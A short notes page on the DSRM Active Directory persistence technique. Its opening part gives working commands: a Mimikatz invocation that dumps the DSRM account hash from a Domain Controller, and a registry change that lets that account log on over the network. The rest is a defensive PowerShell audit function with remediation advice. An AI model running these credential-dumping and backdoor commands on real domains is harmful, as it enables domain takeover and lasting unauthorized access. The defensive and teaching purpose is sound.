DSRM
Get the hash of the DSRM account. That account can log on only locally on the DC, so the logon type has to be changed for it by modifying a registry key.
Dump the hash from the Domain Controller
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName <DC>
First, remote to the DC using a PowerShell session elevated as Domain Admin.
Change logon behavior in the registry, to allow authentication to the Domain Controller over the network.
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
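From the defender's side, the registry change above is the detectable artifact. The following is an added example, not part of the original notes: it audits a DC for the DsrmAdminLogonBehavior value and lists recent DSRM password-set events (Security event 4794). The function name and the 30-day lookback are assumptions.

```powershell
# Added example (not from the original page): audit a Domain Controller for
# the DSRM logon-behavior change. Run on the DC from an elevated session,
# or wrap the call in Invoke-Command.
function Get-DsrmLogonBehaviorAudit {          # hypothetical helper name
    [CmdletBinding()]
    param(
        [int]$LookbackDays = 30                # assumption: review window for event 4794
    )

    $lsaKey = 'HKLM:\System\CurrentControlSet\Control\Lsa'
    $prop = Get-ItemProperty -Path $lsaKey -Name 'DsrmAdminLogonBehavior' -ErrorAction SilentlyContinue
    $value = if ($null -ne $prop) { [int]$prop.DsrmAdminLogonBehavior } else { $null }

    # Documented meanings of the value; absent is treated the same as 0.
    $meanings = @{
        0 = 'Default: DSRM account usable only when the DC is booted into DSRM'
        1 = 'DSRM account usable when the local AD DS service is stopped'
        2 = 'DSRM account usable at any time, including over the network'
    }
    if ($null -eq $value) {
        $meaning = 'Not set (default): DSRM account usable only when booted into DSRM'
    } elseif ($meanings.ContainsKey($value)) {
        $meaning = $meanings[$value]
    } else {
        $meaning = 'Unexpected value, investigate'
    }

    # Event 4794: an attempt was made to set the DSRM administrator password.
    # Only logged when account-management auditing is enabled on the DC.
    $filter = @{
        LogName   = 'Security'
        Id        = 4794
        StartTime = (Get-Date).AddDays(-$LookbackDays)
    }
    $resets = @(Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue)

    [pscustomobject]@{
        ComputerName           = $env:COMPUTERNAME
        DsrmAdminLogonBehavior = $value
        Meaning                = $meaning
        Flagged                = ($null -ne $value -and $value -ne 0)
        DsrmPasswordSetEvents  = $resets.Count
        LatestPasswordSet      = ($resets | Sort-Object TimeCreated | Select-Object -Last 1).TimeCreated
    }
}

Get-DsrmLogonBehaviorAudit | Format-List
```

A flagged result on a production DC is a non-default state; after investigating, set the value back to 0 or remove it with Remove-ItemProperty, and rotate the DSRM password. Alerting on writes to this registry value gives earlier warning than a periodic audit.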